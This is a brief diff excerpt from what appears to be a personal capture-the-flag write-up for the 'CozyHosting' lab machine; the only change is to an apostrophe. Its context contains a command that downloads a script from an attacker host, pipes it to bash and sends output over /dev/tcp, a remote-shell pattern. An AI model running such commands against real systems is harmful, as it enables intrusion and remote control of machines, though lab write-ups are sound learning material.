Paliak/PaliaksNotes/docs/CozyHosting/index.md

 $ curl 10.10.14.30:8000/p | bash &> /dev/tcp/10.10.14.30/9001 &
 ```

-Let's also upload the jar file so we can have a closer look:
+Let’s also upload the jar file so we can have a closer look:

 ```bash
 $ which python3